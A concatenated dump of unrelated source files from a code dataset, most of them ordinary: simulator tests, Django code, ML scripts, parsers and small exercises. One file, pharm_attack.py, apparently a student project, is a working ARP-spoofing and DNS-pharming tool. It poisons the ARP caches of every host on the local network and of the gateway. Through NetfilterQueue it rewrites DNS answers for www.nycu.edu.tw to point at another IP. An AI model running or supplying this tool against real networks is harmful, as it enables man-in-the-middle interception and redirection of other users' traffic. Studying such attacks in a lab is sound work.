ASM.CPU(1), #1\n ASM.CPU(1), #2\n ASM.AI1(1), #3\n ASM.PUSHA(), #4\n ASM.PUSHA(), #4\n ASM.AI1(1), #5\n ASM.JZ(4), #16\n ASM.CPU(1), #8\n ASM.JMP(17),\n ASM.CPU(2) #9 ,10\n ])\n \"\"\"\n prg1 = Program([\n ASM.HEADER(4),\n ASM.AI1(4),\n ASM.BI1(1),\n ASM.AD1(1),\n ASM.JZ(2),\n ASM.JMP(8),\n ASM.EXIT(1)\n ])\n kernel.fileSystem.write(\"asmcode\", prg1)\n kernel.run(\"asmcode\",1)\n kernel.run(\"asmcode\",1)\n\n shell.com(kernel)\n","sub_path":"entregas/practica_6/testcpu.py","file_name":"testcpu.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"418416960","text":"def prime(x):\n\ti=2\n\tif x < 2 or isinstance (x,float):# checks for float or negative\n\t\treturn False\n\telif x == 2 or x == 3: # return prime if x is 2 or 3\n\t\treturn True\n\telse:\n\t\twhile i <= x: #checks primarity for other numbers\n\t\t\tif x%i == 0:\n\t\t\t\treturn False\n\t\t\t\tbreak\n\t\t\ti = i+1\n\t\telse:\n\t\t\treturn True\n\n\n","sub_path":"pr.py","file_name":"pr.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"321905032","text":"\"\"\"\nImport East Riding\n\"\"\"\nfrom django.contrib.gis.geos import Point\n\nfrom data_collection.management.commands import BaseShpImporter\n\nclass Command(BaseShpImporter):\n \"\"\"\n Imports the Polling Station data from East Riding of Yorkshire Council\n \"\"\"\n council_id = 'E06000011'\n districts_name = 'Polling_Districts.shpn'\n stations_name = 'FOI6287_polling-stations.csv'\n\n def district_record_to_dict(self, record):\n return {\n 'internal_council_id': record[1],\n 'name': record[2],\n }\n\n def station_record_to_dict(self, record):\n\n try:\n location = 
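# Sketch: trial division only needs to test divisors up to sqrt(x), and the loop must
# stop before x itself (otherwise x % x == 0 rejects every prime). A compact variant of
# the primality check above:
def prime(x):
    if not isinstance(x, int) or x < 2:   # reject floats and numbers below 2
        return False
    i = 2
    while i * i <= x:                     # any factor above sqrt(x) pairs with one below
        if x % i == 0:
            return False
        i += 1
    return True

assert prime(2) and prime(13) and not prime(12) and not prime(1)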
Point(int(record.easting), int(record.northing), srid=self.srid)\n except ValueError:\n location = Point(float(record.easting), float(record.northing), srid=self.srid)\n addr = [record.name_of_station]\n addr += record.address.split(',')[:-1]\n return {\n 'internal_council_id': record.code,\n 'postcode' : record.address.split(',')[-1],\n 'address' : \"\\n\".join(addr),\n 'location' : location\n }\n \n","sub_path":"polling_stations/apps/data_collection/management/commands/import_east_riding.py","file_name":"import_east_riding.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"631383393","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 9 02:52:09 2019\r\n\r\n@author: spand\r\n\"\"\"\r\n\r\n\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Importing the dataset\r\ndataset = pd.read_csv('ABK2.3change.csv')\r\nX = dataset.iloc[:, 4:13].values\r\ny = dataset.iloc[:, 13].values\r\n\r\n\"\"\"from sklearn.preprocessing import Imputer\r\nimputer = Imputer(missing_values = 'NaN', strategy = 'mean', axis = 0)\r\nimputer = imputer.fit(X[:,1: 16])\r\nX[:,1: 16] = imputer.transform(X[:,1: 16])\"\"\"\r\n\r\n \r\n\r\n\r\n# Splitting the dataset into the Training set and Test set\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.4, random_state = 0)\r\n\r\n# Fitting Decision Tree Classification to the Training set\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nclassifier = DecisionTreeClassifier(criterion = 'entropy', random_state = 0)\r\nclassifier.fit(X_train, y_train)\r\n\r\n# Predicting the Test set results\r\ny_pred = classifier.predict(X_test)\r\n\r\n# Making the Confusion Matrix\r\nfrom sklearn.metrics import confusion_matrix\r\ncm = confusion_matrix(y_test, y_pred)\r\n\r\n#ROC_AUC \r\nfrom sklearn.metrics import roc_curve, auc\r\nfrom sklearn.metrics import roc_auc_score\r\nfpr, tpr, thresholds = roc_curve(y_test, y_pred)\r\nroc_auc = auc(fpr, tpr)\r\n\r\nplt.figure()\r\nplt.plot(fpr, tpr, color='darkorange', lw=1, label='ROC curve (area = %0.2f)' % roc_auc)\r\nplt.plot([0, 1], [0, 1], color='navy', lw=1, linestyle='--')\r\nplt.xlim([0.0, 1.0])\r\nplt.ylim([0.0, 1.05])\r\nplt.xlabel('False Positive Rate')\r\nplt.ylabel('True Positive Rate')\r\nplt.title('Receiver operating characteristic')\r\nplt.legend(loc=\"lower right\")\r\nplt.show()\r\n","sub_path":"DT.py","file_name":"DT.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"159454867","text":"import re\nimport sys\ns = \"\"\"blabla is a tandem repetition\n123123 is good too\ngo go\naaa\"\"\"\ns = s.split('\\n')\npattern = r'(\\b\\w+)\\1\\b'\nfor line in sys.stdin:\n line = line.rstrip()\n n = re.match(pattern,line)\n if n and len (n.regs)>1:\n x0 = n.regs[0]\n x1 = n.regs[1]\n if line[x1[0]:x1[1]]*2 == line[x0[0]:x0[1]]:\n print (line)","sub_path":"Stepik/36/36.py","file_name":"36.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"212784283","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('entrega', '0005_auto_20150917_1551'),\n ]\n\n operations = 
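# Sketch: the tandem-repetition filter above drives re.match plus manual index arithmetic
# on match.regs; re.search with a backreference states the same test more directly
# (an equivalent form, not the exercise's required one):
import re

pattern = re.compile(r'\b(\w+)\1\b')   # a word chunk immediately followed by itself
for line in ["blabla is a tandem repetition", "123123 is good too", "go go", "aaa"]:
    if pattern.search(line):
        print(line)                    # prints the first two lines only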
[\n migrations.AlterModelOptions(\n name='entregador',\n options={'verbose_name_plural': 'Entregadores'},\n ),\n migrations.RenameField(\n model_name='pedido',\n old_name='data_hora',\n new_name='entrada',\n ),\n migrations.AddField(\n model_name='pedido',\n name='partida',\n field=models.DateTimeField(null=True),\n ),\n ]\n","sub_path":"pizzaproj/pizzaria/entrega/migrations/0006_auto_20150917_1646.py","file_name":"0006_auto_20150917_1646.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"492200710","text":"from corsheaders.middleware import CorsMiddleware\nfrom django.conf import settings\nfrom django.contrib.auth.middleware import AuthenticationMiddleware\nfrom django.contrib.sessions.middleware import SessionMiddleware\nfrom django.http import Http404\nfrom django.test import TestCase\nfrom django.test.client import RequestFactory\nfrom django.test.utils import override_settings\nfrom django.urls.base import get_urlconf, set_urlconf\nfrom django_dynamic_fixture import get\n\nfrom readthedocs.core.middleware import SubdomainMiddleware\nfrom readthedocs.projects.models import Domain, Project, ProjectRelationship\nfrom readthedocs.rtd_tests.utils import create_user\n\n\n@override_settings(USE_SUBDOMAIN=True)\nclass MiddlewareTests(TestCase):\n\n def setUp(self):\n self.factory = RequestFactory()\n self.middleware = SubdomainMiddleware()\n self.url = '/'\n self.owner = create_user(username='owner', password='test')\n self.pip = get(\n Project,\n slug='pip',\n users=[self.owner],\n privacy_level='public'\n )\n\n def process_request_auth_middleware(self, request):\n SessionMiddleware().process_request(request)\n AuthenticationMiddleware().process_request(request)\n\n def test_failey_cname(self):\n self.assertFalse(Domain.objects.filter(domain='my.host.com').exists())\n request = self.factory.get(self.url, HTTP_HOST='my.host.com')\n self.process_request_auth_middleware(request)\n r = self.middleware.process_request(request)\n self.assertEqual(r.status_code, 404)\n self.assertEqual(request.cname, True)\n\n @override_settings(PRODUCTION_DOMAIN='readthedocs.org')\n def test_proper_subdomain(self):\n request = self.factory.get(self.url, HTTP_HOST='pip.readthedocs.org')\n self.middleware.process_request(request)\n self.assertEqual(request.subdomain, True)\n self.assertEqual(request.urlconf, settings.SUBDOMAIN_URLCONF)\n self.assertEqual(request.slug, 'pip')\n\n @override_settings(PRODUCTION_DOMAIN='readthedocs.org')\n def test_wrong_subdomain(self):\n http_host = 'xyz-wrong-sub-domain-xyz.readthedocs.org'\n request = self.factory.get(self.url, HTTP_HOST=http_host)\n with self.assertRaises(Http404):\n self.middleware.process_request(request)\n\n @override_settings(PRODUCTION_DOMAIN='readthedocs.org')\n def test_restore_urlconf_after_request(self):\n \"\"\"\n The urlconf attribute for the current thread\n should remain intact after each request,\n When is set to None it means 'use default from settings'.\n \"\"\"\n set_urlconf(None)\n urlconf = get_urlconf()\n self.assertIsNone(urlconf)\n\n self.client.get(self.url, HTTP_HOST='pip.readthedocs.org')\n urlconf = get_urlconf()\n self.assertIsNone(urlconf)\n\n self.client.get(self.url)\n urlconf = get_urlconf()\n self.assertIsNone(urlconf)\n\n self.client.get(self.url, HTTP_HOST='pip.readthedocs.org')\n urlconf = get_urlconf()\n self.assertIsNone(urlconf)\n\n @override_settings(PRODUCTION_DOMAIN='prod.readthedocs.org')\n def 
test_subdomain_different_length(self):\n request = self.factory.get(\n self.url, HTTP_HOST='pip.prod.readthedocs.org'\n )\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, settings.SUBDOMAIN_URLCONF)\n self.assertEqual(request.subdomain, True)\n self.assertEqual(request.slug, 'pip')\n\n def test_domain_object(self):\n self.domain = get(Domain, domain='docs.foobar.com', project=self.pip)\n\n request = self.factory.get(self.url, HTTP_HOST='docs.foobar.com')\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, settings.SUBDOMAIN_URLCONF)\n self.assertEqual(request.domain_object, True)\n self.assertEqual(request.slug, 'pip')\n\n def test_domain_object_missing(self):\n self.domain = get(Domain, domain='docs.foobar2.com', project=self.pip)\n request = self.factory.get(self.url, HTTP_HOST='docs.foobar.com')\n self.process_request_auth_middleware(request)\n r = self.middleware.process_request(request)\n self.assertEqual(r.status_code, 404)\n\n def test_request_header(self):\n request = self.factory.get(\n self.url, HTTP_HOST='some.random.com', HTTP_X_RTD_SLUG='pip'\n )\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, settings.SUBDOMAIN_URLCONF)\n self.assertEqual(request.cname, True)\n self.assertEqual(request.rtdheader, True)\n self.assertEqual(request.slug, 'pip')\n\n @override_settings(PRODUCTION_DOMAIN='readthedocs.org')\n def test_proper_cname_uppercase(self):\n get(Domain, project=self.pip, domain='pip.random.com')\n request = self.factory.get(self.url, HTTP_HOST='PIP.RANDOM.COM')\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, settings.SUBDOMAIN_URLCONF)\n self.assertEqual(request.cname, True)\n self.assertEqual(request.slug, 'pip')\n\n def test_request_header_uppercase(self):\n request = self.factory.get(\n self.url, HTTP_HOST='some.random.com', HTTP_X_RTD_SLUG='PIP'\n )\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, settings.SUBDOMAIN_URLCONF)\n self.assertEqual(request.cname, True)\n self.assertEqual(request.rtdheader, True)\n self.assertEqual(request.slug, 'pip')\n\n def test_use_subdomain(self):\n domain = 'doesnt.exists.org'\n get(Domain, project=self.pip, domain=domain)\n request = self.factory.get(self.url, HTTP_HOST=domain)\n res = self.middleware.process_request(request)\n self.assertIsNone(res)\n self.assertEqual(request.slug, 'pip')\n self.assertTrue(request.domain_object)\n\n @override_settings(PRODUCTION_DOMAIN='readthedocs.org')\n def test_long_bad_subdomain(self):\n domain = 'www.pip.readthedocs.org'\n request = self.factory.get(self.url, HTTP_HOST=domain)\n self.process_request_auth_middleware(request)\n res = self.middleware.process_request(request)\n self.assertEqual(res.status_code, 400)\n\n @override_settings(PRODUCTION_DOMAIN='readthedocs.org')\n def test_long_subdomain(self):\n domain = 'some.long.readthedocs.org'\n request = self.factory.get(self.url, HTTP_HOST=domain)\n self.process_request_auth_middleware(request)\n res = self.middleware.process_request(request)\n self.assertIsNone(res)\n\n\nclass TestCORSMiddleware(TestCase):\n\n def setUp(self):\n self.factory = RequestFactory()\n self.middleware = CorsMiddleware()\n self.url = '/api/v2/search'\n self.owner = create_user(username='owner', password='test')\n self.project = get(\n Project, slug='pip',\n users=[self.owner], privacy_level='public',\n mail_language_project=None,\n )\n self.subproject = get(\n Project,\n users=[self.owner],\n privacy_level='public',\n 
mail_language_project=None,\n )\n self.relationship = get(\n ProjectRelationship,\n parent=self.project,\n child=self.subproject,\n )\n self.domain = get(Domain, domain='my.valid.domain', project=self.project)\n\n def test_proper_domain(self):\n request = self.factory.get(\n self.url,\n {'project': self.project.slug},\n HTTP_ORIGIN='http://my.valid.domain',\n )\n resp = self.middleware.process_response(request, {})\n self.assertIn('Access-Control-Allow-Origin', resp)\n\n def test_invalid_domain(self):\n request = self.factory.get(\n self.url,\n {'project': self.project.slug},\n HTTP_ORIGIN='http://invalid.domain',\n )\n resp = self.middleware.process_response(request, {})\n self.assertNotIn('Access-Control-Allow-Origin', resp)\n\n def test_valid_subproject(self):\n self.assertTrue(\n Project.objects.filter(\n pk=self.project.pk,\n subprojects__child=self.subproject,\n ).exists(),\n )\n request = self.factory.get(\n self.url,\n {'project': self.subproject.slug},\n HTTP_ORIGIN='http://my.valid.domain',\n )\n resp = self.middleware.process_response(request, {})\n self.assertIn('Access-Control-Allow-Origin', resp)\n\n def test_apiv2_endpoint_allowed(self):\n request = self.factory.get(\n '/api/v2/version/',\n {'project__slug': self.project.slug, 'active': True},\n HTTP_ORIGIN='http://my.valid.domain',\n )\n resp = self.middleware.process_response(request, {})\n self.assertIn('Access-Control-Allow-Origin', resp)\n\n def test_apiv2_endpoint_not_allowed(self):\n request = self.factory.get(\n '/api/v2/version/',\n {'project__slug': self.project.slug, 'active': True},\n HTTP_ORIGIN='http://invalid.domain',\n )\n resp = self.middleware.process_response(request, {})\n self.assertNotIn('Access-Control-Allow-Origin', resp)\n\n # POST is not allowed\n request = self.factory.post(\n '/api/v2/version/',\n {'project__slug': self.project.slug, 'active': True},\n HTTP_ORIGIN='http://my.valid.domain',\n )\n resp = self.middleware.process_response(request, {})\n self.assertNotIn('Access-Control-Allow-Origin', resp)\n","sub_path":"readthedocs/rtd_tests/tests/test_middleware.py","file_name":"test_middleware.py","file_ext":"py","file_size_in_byte":9687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"295218308","text":"from django.urls import path\nfrom . 
import views\n\napp_name = 'usersignup'\nurlpatterns = [\n path('', views.index, name='homepage'),\n path('login/', views.login, name='login_page'),\n path('signup/', views.create_profile, name='create_profile'),\n path('signup/final', views.create_web_profile, name='web_profile_create'),\n path('welcome/', views.redirect_page, name='welcome_page')\n]","sub_path":"usersignup/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"223067912","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport requests\nfrom lxml import html\n\nfrom parsers.team_parser import TeamParser\nfrom parsers.game_parser import GameParser\n\n\ndef test_2016():\n\n url = \"http://www.nhl.com/scores/htmlreports/20162017/ES020776.HTM\"\n\n tp = TeamParser(get_data(url))\n tp.load_data()\n tp.create_teams()\n\n gp = GameParser(get_data(url), None)\n gp.load_data()\n gp.create_game(tp.teams)\n\n assert gp.game_data == [\n 'Saturday, February 4, 2017', 'Attendance 19,092 at Amalie Arena',\n 'Start 7:08 EST; End 10:09 EST', 'Game 0776', 'Final']\n\n\ndef test_playoff_game():\n\n url = \"http://www.nhl.com/scores/htmlreports/20122013/ES030325.HTM\"\n\n tp = TeamParser(get_data(url))\n tp.load_data()\n tp.create_teams()\n\n gp = GameParser(2, get_data(url), None)\n gp.load_data()\n gp.create_game(tp.teams)\n\n assert gp.game_data == [\n 'Saturday, June 8, 2013', 'Attendance 22,237 at United Center',\n 'Start 7:20 CDT; End 11:02 CDT', 'Game 0325', 'Final']\n\n\ndef get_data(url):\n r = requests.get(url)\n return html.fromstring(r.text)\n\n\nif __name__ == '__main__':\n\n test_2016()\n test_playoff_game()\n","sub_path":"test_game_parser.py","file_name":"test_game_parser.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"583232835","text":"# April 2019\n# Read the matlab file\n# Write a text file\n# Plot in GMT\n\n\"\"\"\nstations_used\nLats\nslip_rate\nel\nnd\nKern\nsig_dUv\nLons\ndEv\nnd_ll\nsig_dNv\ndUv\ndNv\nsig_dEv\n\"\"\"\n\nimport numpy as np \nimport scipy.io\nimport sys\n\ndef configure_and_read():\n\tmatlab_file=\"forKathryn.mat\";\n\toutput_file=\"resolution.txt\";\n\tprint(\"Making text files for %s \" % (matlab_file) );\n\treturn matlab_file, output_file;\n\ndef read_matlab_file(matlab_file):\n\tmat = scipy.io.loadmat(matlab_file);\n\treturn mat;\n\ndef write_gmt(mat, output_file):\n\n\t# model_fit = np.dot(mat['Kern'],mat['slip_rate']);\n\t# ofile_model = open(output_file_model, 'w');\n\t# for i in range(len(mat['Lons'])):\n\t# \tofile_model.write(\"%f %f %f %f\\n\" % (mat['Lons'][i], mat['Lats'][i], model_fit[i*3], model_fit[i*3+1] ) )\n\t# ofile_model.close();\n\n\n\tmedian_Kern=np.array(mat['median_Kern']).T;\n\tmedian_Kern_area_adjusted=np.array(mat['median_Kern_area_adjusted']).T;\t\n\tarea = np.array(mat['a']).T;\n\tmean_area=np.mean(area);\n\n\t# median_area_adjusted = [(median_Kern[i]/area[i])*mean_area for i in range(len(median_Kern))];\n\n\t# print(np.max(median_Kern)*1000)\n\n\n\tofile=open(output_file,'w');\n\tfor i in range(len(median_Kern)):\n\t\tofile.write(\">-Z%f\\n\" % (median_Kern[i]*1000) ); # in mm\n\t\t# ofile.write(\">-Z%f\\n\" % (median_area_adjusted[i]*1000) ); # in mm\n\t\tfirst_index=mat['el'][i][0]-1;\n\t\tsecond_index=mat['el'][i][1]-1;\n\t\tthird_index=mat['el'][i][2]-1;\n\t\tlimit=42;\n\t\tif mat['nd_ll'][first_index][1]>limit or 
mat['nd_ll'][second_index][1]>limit or mat['nd_ll'][third_index][1]>limit:\n\t\t\tcontinue;\n\t\tofile.write(\"%f %f\\n\" % (mat['nd_ll'][first_index][0], mat['nd_ll'][first_index][1]) ) # the first point in the triangle \n\t\tofile.write(\"%f %f\\n\" % (mat['nd_ll'][second_index][0], mat['nd_ll'][second_index][1]) ) # the second point in the triangle\n\t\tofile.write(\"%f %f\\n\" % (mat['nd_ll'][third_index][0], mat['nd_ll'][third_index][1]) ) # the third point in the triangle\n\tofile.close();\n\treturn;\n\nif __name__==\"__main__\":\n\tmatlab_file, output_file=configure_and_read();\n\tmat = read_matlab_file(matlab_file);\n\twrite_gmt(mat, output_file);\n\n","sub_path":"Models/Model_Resolution/mat2gmt.py","file_name":"mat2gmt.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"599951021","text":"'''Given a text of digits and lowercase Latin letters followed by a period, determine\r\nwhether there are more vowels or more consonants in the text. Print the result to the screen.'''\r\nwhile True:\r\n    s=input('Write text:')\r\n    vowels='a','e','y','o','u','i'\r\n    cons='q','w','r','t','p','s','d','f','g','h','j','k','l','z','x','c','v','b','n','m'\r\n    if s.count('.')>1:\r\n        print('Only one period at the end of the text!')\r\n        continue\r\n    elif s.count('.')<1:\r\n        print('Write a period at the end of the text!')\r\n        continue\r\n    vow=0\r\n    con=0\r\n    sym=0\r\n    for i in range(len(s)):\r\n        for j in range(len(s[i])):\r\n            if s[i][j] in vowels:\r\n                vow+=1\r\n            elif s[i][j] in cons:\r\n                con+=1\r\n            else:\r\n                sym+=1\r\n    if vow>con:\r\n        print('There are more vowels than consonants')\r\n    elif con>vow:\r\n        print('There are more consonants than vowels')\r\n    else:\r\n        print('Vowels and consonants occur equally often')\r\n    print(f'Vowels:{vow} \\nConsonants:{con}\\nSymbols:{sym}')\r\n    c=input('Press 1 to rerun or anything else to close the program')\r\n    if c=='1':\r\n        continue\r\n    else:\r\n        break\r\n    \r\n    \r\n","sub_path":"5.1.py","file_name":"5.1.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"542519772","text":"from models.models import Taboola\n\ndef main(request):\n    data = request.get_json(silent=True)\n    print(data)\n\n    if \"table\" in data:\n        response = Taboola.factory(\n            table=data[\"table\"],\n            start=data.get(\"start\"),\n            end=data.get(\"end\"),\n        ).run()\n    else:\n        raise ValueError(data)\n\n    print(response)\n    return response\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"53441403","text":"#!/usr/bin/env python3\n\nimport scapy.all as scapy\n#from scapy.all import *\nimport time\nimport sys\nimport argparse\nimport socket, struct\nimport subprocess\nimport os\nimport threading\nfrom netfilterqueue import NetfilterQueue # for putting packets into a queue so they can be modified\nimport netifaces\n\ndef get_mac(ip):\n    for a in range(10):\n        arp_request = scapy.ARP(pdst = ip)\n        broadcast = scapy.Ether(dst =\"ff:ff:ff:ff:ff:ff\")\n        arp_request_broadcast = broadcast / arp_request\n        answered_list, unanswer = scapy.srp(arp_request_broadcast, timeout = 5, verbose = False)\n        if len(answered_list) == 0:\n            print(\"no reply, retrying\")\n            continue\n        else:\n            return answered_list[0][1].hwsrc\n    print(\"Can't find mac address\")\n    sys.exit(1)\n\n    # return 'b4:6b:fc:1d:e8:9f' # error here, use this for temp\n\ndef spoof(target_ip, 
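# Sketch: the translate_to_slash helper below packs the dotted-quad netmask into a 32-bit
# integer and locates the lowest set bit; counting the set bits gives the same prefix
# length in two lines, assuming a contiguous (valid) mask:
import socket, struct

def netmask_to_prefix(netmask):
    packed = struct.unpack('!I', socket.inet_aton(netmask))[0]
    return bin(packed).count('1')      # '255.255.255.0' -> 24

assert netmask_to_prefix('255.255.255.0') == 24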
spoof_ip, target_mac):\n packet = scapy.ARP(op = 2, pdst = target_ip, hwdst = target_mac, psrc = spoof_ip)\n \n scapy.send(packet, verbose = False)\n\ndef restore(destination_ip, source_ip):\n destination_mac = get_mac(destination_ip)\n source_mac = get_mac(source_ip)\n packet = scapy.ARP(op = 2, pdst = destination_ip, hwdst = destination_mac, psrc = source_ip, hwsrc = source_mac)\n scapy.send(packet, verbose = False)\n\ndef translate_to_slash(netmask):\n temp = netmask.rsplit('.')\n number = 0\n for i in range(4):\n number = number << 8\n number += int(temp[i])\n slash = 0\n for i in range(32):\n if number % 2 == 1:\n slash = i\n break\n number = number >> 1\n return 32 - slash\n\n\n# def get_local_info():\n# interfaces = netifaces.ifaddresses('enp0s3')\n# # dictionary\n# normal_internet = interfaces[netifaces.AF_INET][0]\n# address = normal_internet['addr']\n# netmask = normal_internet['netmask']\n# broadcast = normal_internet['broadcast']\n# # slash = IPAddress(netmask).netmask_bits()\n# slash = translate_to_slash(netmask)\n# # obtain gateway\n# gws = netifaces.gateways()\n# gw = gws['default'][netifaces.AF_INET][0]\n \n# return address, netmask, broadcast, str(slash), gw\n\ndef get_local_info():\n \n interfaces = netifaces.interfaces()\n\n for interface_name in interfaces:\n interface = netifaces.ifaddresses(interface_name)\n try:\n # dictionary\n normal_internet = interface[netifaces.AF_INET][0]\n address = normal_internet['addr']\n netmask = normal_internet['netmask']\n broadcast = normal_internet['broadcast']\n # slash = IPAddress(netmask).netmask_bits()\n slash = translate_to_slash(netmask)\n # obtain gateway\n gws = netifaces.gateways()\n gw = gws['default'][netifaces.AF_INET][0]\n return address, netmask, broadcast, str(slash), gw\n except KeyError:\n print(\"this interface: \", interface_name, \" isn't feasible\")\n continue\n\ndef getDevice(ip, gw):\n request = scapy.ARP()\n request.pdst = ip\n broadcast = scapy.Ether()\n\n broadcast.dst = 'ff:ff:ff:ff:ff:ff'\n\n request_broadcast = broadcast / request\n clients = scapy.srp(request_broadcast, timeout=10, verbose=1)[0]\n\n result = []\n\n print('Available devices')\n print('----------------------------')\n print('IP MAC')\n print('----------------------------')\n for element in clients:\n if element[1].psrc != gw:\n print(element[1].psrc + \" \" + element[1].hwsrc)\n result_dict = {\"ip\": element[1].psrc, \"mac\": element[1].hwsrc}\n result.append(result_dict)\n print(' ')\n\n return result\n\n# Modifying the DNSRR packet\ndef pharming(pkt):\n # Change the queued packet to scapy packet payload\n data=scapy.IP(pkt.get_payload())\n # If the packet is really the DNS query response packet\n if data.haslayer(scapy.DNSRR):\n # If the query website is the target website\n # print(str(data[scapy.DNSQR].qname))\n if \"www.nycu.edu.tw\" in str(data[scapy.DNSQR].qname):\n # Change the query IP to target server IP\n ans=scapy.DNSRR(rrname=data[scapy.DNSQR].qname, rdata=\"140.113.207.246\")\n data[scapy.DNS].an=ans # Save the modified IP into Scapy packet\n data[scapy.DNS].ancount=1 # Query answer count = 1\n\n # Delete the check field from IP and UDP header (DNS query use UDP)\n del data[scapy.IP].len\n del data[scapy.IP].chksum\n del data[scapy.UDP].len\n del data[scapy.UDP].chksum\n\n pkt.set_payload(bytes(data)) #Turn the modified scapy packet payload back to original packet type\n # Accept the packet\n pkt.accept()\n\n# Sniff() starter\ndef startPharming():\n # Build up the queue number 0\n os.system(\"iptables -I FORWARD -j NFQUEUE 
--queue-num 0\")\n print(\"Start pharming...\")\n # Modify the DNS response packet by \"pharming\" function\n queue=NetfilterQueue()\n try:\n # Bind the queue number 0 with \"pharming\" function\n queue.bind(0,pharming)\n # Start queuing the packets\n queue.run()\n except KeyboardInterrupt:\n # Flush the queue number 0\n os.system(\"iptables --flush\")\n\nif __name__ == '__main__':\n\n address, netmask, broadcast, slash, gw = get_local_info()\n\n # print(get_mac('192.168.99.100')) \n result = getDevice(address + '/' + slash, gw)\n\n # target_ip = \"172.20.10.11\" # Enter your target IP\n # gateway_ip = \"192.168.99.1\" # Enter your gateway's IP\n gateway_ip = gw\n\n\n t = threading.Thread(target = startPharming)\n t.setDaemon(True)\n t.start()\n\n try:\n sent_packets_count = 0\n while True:\n for index in result:\n if index['ip'] != gw:\n target_ip = index['ip']\n target_mac = index['mac']\n spoof(target_ip, gateway_ip, target_mac) # cheat on victim to know I am gateway\n spoof(gateway_ip, target_ip, target_mac) # cheat on switch to know I am target\n sent_packets_count = sent_packets_count + 2\n # print(\"\\r[*] Packets Sent \"+str(sent_packets_count), end =\"\")\n # time.sleep(0.5) # Waits for two seconds\n \n except KeyboardInterrupt:\n print(\"\\nCtrl + C pressed.............Exiting\")\n # restore(gateway_ip, target_ip)\n # restore(target_ip, gateway_ip)\n print(\"[-] Arp Spoof Stopped\")\n os.system(\"iptables --flush\")\n t.join()\n print(\"stop thread\")","sub_path":"project2/pharm_attack.py","file_name":"pharm_attack.py","file_ext":"py","file_size_in_byte":6585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"28564575","text":"import pickle\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Conv2D, MaxPool2D, Flatten, LSTM, TimeDistributed\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.optimizers import Adam\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\n\nwith open('total.pickle', 'rb') as handle:\n data = pickle.load(handle)\n\n\ndef transformToXy(data):\n X, y = [], []\n for name in data['code']:\n X.extend([i for i in data[name]])\n y.extend([data['label'][name]] * len(data[name]))\n\n return X, y\n\ndef encodeXy(X, y):\n X = np.array(X)\n y = np.array(y)\n y = to_categorical(y, num_classes=len(data['code']))\n return X, y\n\n\nX, y = transformToXy(data)\nX, y = encodeXy(X, y)\nprint(X.shape)\nprint(y)\nX_train, X_test, y_train, y_test = train_test_split(X,\n y.reshape(-1, 1, len(data['code'])),\n test_size=0.2,\n random_state=42\n )\nprint(X_train.shape)\nprint(y_train.shape)\nprint(len(data['code']))\nmodel = Sequential([\n Dense(2048, input_shape=(1, 256), activation='relu'),\n Dropout(0.5),\n Dense(len(data['code']), activation='softmax')\n])\nmodel.compile(optimizer=Adam(),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\nmodel.fit(X_train, y_train, epochs=35, validation_split=0.2)\nprint(model.predict(X[0].reshape(-1, 1, 256)), y[0])\nprint(model.evaluate(X_test, y_test))\nmodel.save('model.h5')","sub_path":"Voice-Augment/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"639498224","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 27 14:26:06 2017\n\n@author: ansty\n\"\"\"\n\n\nfrom osmread import parse_file, Node\n\n# Loading data from the OSM file.\ndef 
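# Sketch: the training script above one-hot encodes integer labels with to_categorical
# and reshapes targets to (-1, 1, K) to match the Dense layer's (1, 256) input rank.
# The encoding step in miniature, with illustrative labels:
import numpy as np
from tensorflow.keras.utils import to_categorical

num_classes = 3
y = np.array([0, 2, 1, 2])
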